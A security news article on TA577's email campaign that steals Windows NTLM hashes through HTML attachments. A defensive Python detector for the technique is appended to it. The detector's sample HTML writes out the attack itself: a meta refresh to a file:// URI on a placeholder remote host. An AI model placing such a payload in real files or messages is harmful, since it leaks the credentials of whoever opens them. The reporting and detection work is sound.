Malicious email campaign steals NTLM hashes

A threat group that acts as an initial access broker is targeting organizations with rogue email attachments that steal Microsoft Windows NT LAN Manager (NTLM) authentication information when opened. The group’s campaigns last week targeted hundreds of entities with thousands of email messages, researchers warn.

NTLM is the default authentication mechanism used on Windows networks when a computer tries to access network resources or services, for example file shares over the SMB protocol. NTLM credentials are not sent in the clear but as a cryptographic hash; depending on how complex the passwords are, however, there are ways to potentially recover them from such hashes, or to use the hashes directly in attacks.

“Proofpoint typically observes TA577 conducting attacks to deliver malware and has never observed this threat actor demonstrating the attack chain used to steal NTLM credentials first observed on 26 February,” researchers from security firm Proofpoint said in a report. “Recently, TA577 has been observed delivering Pikabot using a variety of attack chains.”

Thread hijacking leads to rogue HTML files

TA577, also tracked in the security industry as Hive0118, is a financially motivated access broker with a long history of distributing trojan programs. The group used to be one of the main affiliates for the Qbot botnet before it was disrupted, but has also been observed distributing malware programs such as IcedID, SystemBC, SmokeLoader, Ursnif, Cobalt Strike, and more recently Pikabot.

Since the group sells access to compromised computers to other cybercriminal gangs, systems compromised by TA577 have had follow-on ransomware infections, most notably with Black Basta. TA577 also specializes in a technique known as thread hijacking, in which its rogue email messages are crafted to appear as replies to previously sent legitimate emails. The latest campaigns seen by Proofpoint used messages asking recipients whether they had time to look at a document sent previously.

The emails contained a .zip archive together with the password needed to unpack it. The archive in turn contained an innocuous-looking HTML document that was customized for each victim. When opened, the HTML automatically triggers a connection attempt to a remote SMB server controlled by the attackers: a meta refresh in the file points to a file-scheme (file://) URI ending in .txt.
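A defender-side check for the attachment pattern described above, added here as an example (it is not code from the Proofpoint report): it parses an HTML file, extracts any meta refresh target, and flags targets that point at a remote file:// URI or UNC path, since opening either makes Windows connect over SMB and authenticate with NTLM. The sample HTML and the 203.0.113.10 host are constructed placeholders.

```python
"""Flag HTML attachments whose <meta http-equiv="refresh"> redirects to a
remote file:// URI or UNC path (the pattern that triggers an outbound
SMB/NTLM exchange).  Added example; sample input below is constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# A refresh "content" attribute looks like "0; url=<target>"; the url= part
# and quotes around the target are optional in practice, so accept both.
_REFRESH_RE = re.compile(
    r"^\s*\d*\s*[;,]?\s*(?:url\s*=\s*)?['\"]?(.*?)['\"]?\s*$",
    re.IGNORECASE | re.DOTALL)


class _RefreshCollector(HTMLParser):
    """Collect every meta refresh target in the document."""
    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "meta":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("http-equiv", "").strip().lower() == "refresh":
            m = _REFRESH_RE.match(a.get("content", ""))
            if m:
                self.targets.append(m.group(1).strip())


def is_remote_file_uri(target: str) -> bool:
    """True if the target names a remote host via file:// or a UNC path."""
    t = target.strip().replace("\\", "/")      # \\host\share -> //host/share
    if t.startswith("//") and len(t) > 2 and t[2] != "/":
        return True                             # bare UNC path
    p = urlparse(t)
    return p.scheme.lower() == "file" and p.netloc.lower() not in ("", "localhost")


def suspicious_refresh_targets(html: str) -> list:
    """Return refresh targets in `html` that would cause an SMB/NTLM connection."""
    c = _RefreshCollector()
    c.feed(html)
    return [t for t in c.targets if is_remote_file_uri(t)]


# Constructed sample mirroring the described attachment (placeholder host).
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="0; url=file://203.0.113.10/docs/notes.txt">
</head><body>Loading document...</body></html>"""

if __name__ == "__main__":
    print(suspicious_refresh_targets(SAMPLE_HTML))
```

A local file:/// path or an ordinary https:// redirect is not flagged, so the check isolates the SMB-triggering case rather than every meta refresh.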
